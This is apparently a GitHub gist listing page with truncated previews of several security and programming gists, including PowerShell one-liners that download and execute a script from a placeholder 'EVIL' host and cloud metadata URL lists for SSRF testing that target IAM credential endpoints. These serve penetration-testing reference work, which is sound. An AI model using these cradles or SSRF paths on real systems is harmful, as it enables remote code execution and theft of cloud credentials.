- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
Adel Ka 0x4D31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
unfo
/ how-to-oscp-final.md
Last active
April 18, 2026 22:39
jhaddix
/ cloud_metadata.txt
Last active
April 12, 2026 06:31
— forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
honkskillet
/ byte-sizetuts.md
Last active
March 31, 2026 21:48
A series of golang tutorials with youtube videos.
by alexander white ©
BuffaloWill
/ cloud_metadata.txt
Last active
March 26, 2026 23:27
Cloud Metadata Dictionary useful for SSRF Testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
dmattera
/ launchctl_man_pages.md
Last active
March 21, 2026 11:37
macOS man page entries for launchctl services
This list was auto-generated on macOS 10.15 (Catalina) using a script that did the following:
- grabbed the name of all the
.plistfiles located in the 5 folders used bylaunchctl:
~/Library/LaunchAgentsPer-user agents provided by the user./Library/LaunchAgentsPer-user agents provided by the administrator./Library/LaunchDaemonsSystem wide daemons provided by the administrator./System/Library/LaunchAgentsOS X Per-user agents./System/Library/LaunchDaemonsOS X System wide daemons.
jaredcatkinson
/ Get-InjectedThread.ps1
Last active
March 13, 2026 04:24
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-InjectedThread | |
| { | |
| <# | |
| .SYNOPSIS | |
| Looks for threads that were created as a result of code injection. | |
| .DESCRIPTION | |
This is a guide on how to email securely.
There are many guides on how to install and use PGP to encrypt email. This is not one of them. This is a guide on secure communication using email with PGP encryption. If you are not familiar with PGP, please read another guide first. If you are comfortable using PGP to encrypt and decrypt emails, this guide will raise your security to the next level.
JeffPaine
/ beautiful_idiomatic_python.md
Last active
January 24, 2026 10:23
Moved to: https://github.com/JeffPaine/beautiful_idiomatic_python
Now located at https://github.com/JeffPaine/beautiful_idiomatic_python.
Github gists don't support Pull Requests or any notifications, which made it impossible for me to maintain this (surprisingly popular) gist with fixes, respond to comments and so on. In the interest of maintaining the quality of this resource for others, I've moved it to a proper repo. Cheers!
n0531m
/ list_gcp_iprange.sh
Last active
August 29, 2025 06:29
Google Cloud Platform : ip address range
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # https://cloud.google.com/compute/docs/faq#find_ip_range | |
| # nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8 | |
| myarray=() | |
| for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :` | |
| do | |
| myarray+=($LINE) | |
| for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :` |
NewerOlder